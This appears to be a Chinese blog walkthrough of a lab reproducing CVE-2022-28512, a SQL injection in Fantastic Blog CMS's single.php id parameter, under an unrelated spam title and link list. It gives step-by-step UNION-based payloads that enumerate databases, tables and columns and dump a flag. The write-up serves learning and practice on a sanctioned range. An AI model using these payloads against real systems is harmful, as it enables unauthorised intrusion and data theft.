当前位置: 首页 > news >正文

什么是企业网站营销营销网站建设创意

什么是企业网站营销,营销网站建设创意,图片编辑工具免费版,个体工商户营业执照查询官网文章目录 前言一、CVE-2022-28512靶场简述二、找注入点三、CVE-2022-28512漏洞复现1、判断注入点2、爆显位个数3、爆显位位置4 、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。…

文章目录

  • 前言
  • 一、CVE-2022-28512靶场简述
  • 二、找注入点
  • 三、CVE-2022-28512漏洞复现
    • 1、判断注入点
    • 2、爆显位个数
    • 3、爆显位位置
    • 4 、爆数据库名
    • 5、爆数据库表名
    • 6、爆数据库列名
    • 7、爆数据库数据
  • 总结


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、CVE-2022-28512靶场简述

Sourcecodester Fantastic Blog CMS 1.0 中存在一个 SQL 注入漏洞。攻击者可以通过“id=5”参数在“/fantasticblog/single.php”中注入查询。
在这里插入图片描述

二、找注入点

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
我们就尝试找single.php的界面。
打开发现是有一个登录框,和一个登录注册。但是登录框是search.php,而且尝试sql注入也是无果。(如图所示)
在这里插入图片描述在这里插入图片描述
点开图片发现跳转到single.php界面,成功找到注入地方(如图所示)
在这里插入图片描述

三、CVE-2022-28512漏洞复现

  • 1、判断注入点
  • 2、爆显位个数
  • 3、爆显位位置
  • 4、爆数据库名
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

(如图所示)这里我们老规矩抛出and 1=1 和 and 1=2测试。发现页面依旧正常,排除数字型。直接提交3’发现报错,报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near ‘‘3’’’ at line 1

在这里插入图片描述
通过报错信息可以知道是单引号闭合,这里构造的payload为

id=3'--+

2、爆显位个数

注入语句为

id=3' order by 9--+

发现为10的时候报错,那么显位个数是9了。
在这里插入图片描述

3、爆显位位置

注入语句为

id=-3' union select 1,2,3,4,5,6,7,8,9--+

发现有4可以注入,我就在4注入了
在这里插入图片描述

4 、爆数据库名

注入语句为

id=-3' union select 1,2,3,database(),5,6,7,8,9--+

在这里插入图片描述

得到数据库ctf

5、爆数据库表名

注入语句为

id=-3' union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()--+

在这里插入图片描述
得到数据库表名
titles,page_hits,membership_userpermissions,membership_groups,blog_categories,membership_userrecords,membership_users,editors_choice,blogs,links,flag,banner_posts,membership_grouppermissions,visitor_info
关键表名是flag

6、爆数据库列名

注入语句为

id=-3' union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name="flag"--+

得到列名flag

在这里插入图片描述

7、爆数据库数据

注入语句为

id=-3' union select 1,2,3,group_concat(flag),5,6,7,8,9 from flag --+

在这里插入图片描述
得到flag
flag{6bf76a30-c821-429b-b2e7-03b6068cdf36}


总结

这一关的信息收集比较简单,一下子找到注入点了。这是一个简单的单引号闭合简单注入,极其简单。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

http://www.hengruixuexiao.com/news/18503.html

相关文章:

  • 虚拟机可以做多个网站站长工具 seo综合查询
  • seo网站设计点击软件seo每日工作
  • 网站制作流程视频教程沙洋县seo优化排名价格
  • 有什么网站可以做六级题目嘛网络营销课程大概学什么内容
  • web网站开发模板媒介平台
  • 黑客攻击的网站seo优化专员工作内容
  • 电商网站前端架构设计百度网盘搜索引擎入口在哪
  • 张家港市网站制作seo免费优化工具
  • 网站县区分站点建设沈阳关键词推广
  • 双语网站建设报价贵州seo和网络推广
  • 南通高端网站建设北京seo加盟
  • 沈阳建设公司网站怎么做优化
  • java手机网站怎么做的百度指数与百度搜索量
  • 渭南市网站建设怎么查找关键词排名
  • 重庆网站建设制作设计seo百度快照优化公司
  • php大气企业网站广州网站优化多少钱
  • 智能建站做网站好吗超级外链推广
  • 企业网站怎么做优化外贸seo软件
  • 微博推广有用吗天津优化加盟
  • 东莞做网站开发的公司360搜索首页网址是多少
  • 网站建设咨询公百度搜索广告价格
  • 天津建设工程竣工备案公示网站上海网络推广培训机构
  • wordpress 默认页面自适应优化课程设置
  • 乐清网站设计哪家好怎么优化网站
  • 营销型网站设计房地产完整的社群营销方案
  • 交友网站wordpressseo手机排名软件
  • server2008 iis 网站qq群推广方法
  • 南京公司网站建设线上商城的推广方案
  • 宠物网站建设的目的云南今日头条新闻
  • 网站建设学习资料seo网站排名优化公司哪家